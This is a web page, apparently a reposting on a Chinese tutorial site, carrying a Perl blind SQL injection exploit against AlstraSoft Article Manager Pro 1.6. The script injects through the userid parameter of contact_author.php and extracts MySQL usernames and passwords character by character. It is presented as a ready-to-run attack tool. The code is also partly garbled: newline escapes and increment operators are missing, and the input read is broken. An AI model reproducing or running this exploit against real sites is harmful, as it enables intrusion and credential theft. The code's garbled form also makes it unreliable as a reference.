AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
发布时间:2016-02-19 来源:查字典编辑
摘要:#/usr/bin/perl#||Author:GoLd_M#--//-->#--AlstraSoftArticleManagerProBl...

#/usr/bin/perl

#| | Author: GoLd_M

#--//-->

# -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit --

#--//--> Exploit :

use strict;

use LWP::Simple;print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";

print "- AlstraSoft Article Manager Pro Blind SQL Injection Exploit -n";

print " GoLd_M Mahmood_ali Tryag.cc/cc n";

print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";print "nEnter URL (ie: ): ";

chomp(my $url=);if(inject_test($url)) {

print "Injecting.. Please Wait this could take several minutes..nn";

my $details = blind($url);

print "Exploit Success! Admin Details: ".$details;

exit;

}sub blind {my $url = shift;

my $res = undef;

my $chr = 48;

my $substr = 1;

my $done = 1;while($done) {

my $content = get($url."/contact_author.php?userid=1) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM

mysql.user),".$substr.",1))=".$chr."/*");if($content =~ /Previous/ && $chr == 94) { $done = 0; }

elsif($content =~ /Previous/) { $res .= chr($chr); $substr ; $chr = 48; }

else { $chr ; }

}

return $res;

}sub inject_test {my $url = shift;

my $true = get($url."/contact_author.php?userid=1) and 1=1 /*");

my $false = get($url."/contact_author.php?userid=1) and 1=2 /*");if($true =~ /Previous/ && $false !~ /Previous/) {

print "nTarget Site Vulnerable!nn";

return 1;

} else { print "nTarget Site Not Vulnerable! Exiting..n"; exit; }

}

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新电脑安全教程学习
热门电脑安全教程学习
电脑子分类